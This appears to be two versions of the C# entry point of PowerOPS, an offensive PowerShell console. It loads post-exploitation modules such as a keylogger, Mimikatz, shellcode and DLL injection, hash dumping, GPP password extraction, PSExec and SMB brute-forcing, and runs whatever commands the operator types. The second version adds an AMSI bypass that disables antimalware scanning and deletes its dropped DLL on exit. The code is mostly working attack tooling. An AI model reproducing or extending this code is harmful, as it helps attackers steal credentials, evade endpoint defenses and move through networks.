public static void Main() { Console.Title = "PowerOPS - [email protected]"; Console.SetWindowSize(Math.Min(122, Console.LargestWindowWidth), Math.Min(40, Console.LargestWindowHeight)); Console.SetBufferSize(Console.BufferWidth, Console.BufferHeight); string command = null; DisplayBanner(); Console.WriteLine("Type 'show' to list available modules\n"); Runspace runspace = RunspaceFactory.CreateRunspace(); runspace.Open(); do { Console.Write("PS > "); command = Console.ReadLine(); switch (command) { case "show": DisplayModules(); break; case "exit": return; default: if (command.IndexOf("Invoke-Mimikatz", StringComparison.OrdinalIgnoreCase) == 0) { if (!IsUserAdministrator()) { break; } } if (command.IndexOf("Get-PassHashes", StringComparison.OrdinalIgnoreCase) == 0) { if (!IsUserAdministrator()) { break; } } if (command.IndexOf("Invoke-Shellcode", StringComparison.OrdinalIgnoreCase) == 0) { if (!isArch_x86()) { break; } } try { Pipeline pipeline = runspace.CreatePipeline(); pipeline.Commands.AddScript(PowerOPS.GetKeyStrokes()); pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection()); pipeline.Commands.AddScript(PowerOPS.InvokeMimikatz()); pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy()); pipeline.Commands.AddScript(PowerOPS.InvokeReflectivePEInjection()); pipeline.Commands.AddScript(PowerOPS.InvokeShellcode()); pipeline.Commands.AddScript(PowerOPS.InvokeTokenManipulation()); pipeline.Commands.AddScript(PowerOPS.InvokeWMICommand()); pipeline.Commands.AddScript(PowerOPS.PowerUp()); pipeline.Commands.AddScript(PowerOPS.PowerView()); pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation()); pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes()); pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan()); pipeline.Commands.AddScript(PowerOPS.AutoGPPPassword()); pipeline.Commands.AddScript(PowerOPS.PowerCat()); pipeline.Commands.AddScript(PowerOPS.GetProductKey()); pipeline.Commands.AddScript(PowerOPS.Empire_InvokePSExec()); pipeline.Commands.AddScript(PowerOPS.Empire_InvokeSshCommand()); pipeline.Commands.AddScript(command); pipeline.Commands.Add("Out-String"); Collection <PSObject> results = pipeline.Invoke(); StringBuilder stringBuilder = new StringBuilder(); foreach (PSObject obj in results) { stringBuilder.AppendLine(obj.ToString()); } Console.Write(stringBuilder.ToString()); } catch (Exception e) { Console.WriteLine("{0}", e.Message); } break; } } while (command != "exit"); runspace.Close(); Environment.Exit(0); }
public static void Main() { Console.Title = "PowerOPS - [email protected]"; Console.SetWindowSize(Math.Min(122, Console.LargestWindowWidth), Math.Min(40, Console.LargestWindowHeight)); Console.SetBufferSize(Console.BufferWidth, Console.BufferHeight); // Amsi bypass technique from: http://cn33liz.blogspot.co.uk/2016/05/bypassing-amsi-using-powershell-5-dll.html string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE"); amsibypass.Amsi(Arch); string command = null; DisplayBanner(); Console.WriteLine("Type 'show' to list available modules\n"); Runspace runspace = RunspaceFactory.CreateRunspace(); runspace.Open(); do { Console.Write("PS > "); command = Console.ReadLine(); switch (command) { case "show": DisplayModules(); break; case "exit": string path = Directory.GetCurrentDirectory(); if (File.Exists(path + "\\Amsi.dll")) { File.Delete(path + "\\Amsi.dll"); } runspace.Close(); Environment.Exit(0); return; default: if (command.IndexOf("Invoke-Mimikatz", StringComparison.OrdinalIgnoreCase) == 0) { if (!IsUserAdministrator()) { break; } } if (command.IndexOf("Get-PassHashes", StringComparison.OrdinalIgnoreCase) == 0) { if (!IsUserAdministrator()) { break; } } if (command.IndexOf("Invoke-Shellcode", StringComparison.OrdinalIgnoreCase) == 0) { if (!isArch_x86()) { break; } } try { Pipeline pipeline = runspace.CreatePipeline(); pipeline.Commands.AddScript(PowerOPS.GetKeyStrokes()); pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection()); pipeline.Commands.AddScript(PowerOPS.InvokeMimikatz()); pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy()); pipeline.Commands.AddScript(PowerOPS.InvokeReflectivePEInjection()); pipeline.Commands.AddScript(PowerOPS.InvokeShellcode()); pipeline.Commands.AddScript(PowerOPS.InvokeTokenManipulation()); pipeline.Commands.AddScript(PowerOPS.InvokeWMICommand()); pipeline.Commands.AddScript(PowerOPS.PowerUp()); pipeline.Commands.AddScript(PowerOPS.PowerView()); pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation()); pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes()); pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan()); pipeline.Commands.AddScript(PowerOPS.AutoGPPPassword()); pipeline.Commands.AddScript(PowerOPS.PowerCat()); pipeline.Commands.AddScript(PowerOPS.Empire_InvokePSExec()); pipeline.Commands.AddScript(PowerOPS.Empire_InvokeSshCommand()); pipeline.Commands.AddScript(PowerOPS.InvokeMimikittenz()); pipeline.Commands.AddScript(PowerOPS.PowerUpSQL()); pipeline.Commands.AddScript(PowerOPS.InvokeSMBAutoBrute()); pipeline.Commands.AddScript(command); pipeline.Commands.Add("Out-String"); Collection <PSObject> results = pipeline.Invoke(); StringBuilder stringBuilder = new StringBuilder(); foreach (PSObject obj in results) { stringBuilder.AppendLine(obj.ToString()); } Console.Write(stringBuilder.ToString()); } catch (Exception e) { Console.WriteLine("{0}", e.Message); } break; } } while (command != "exit"); }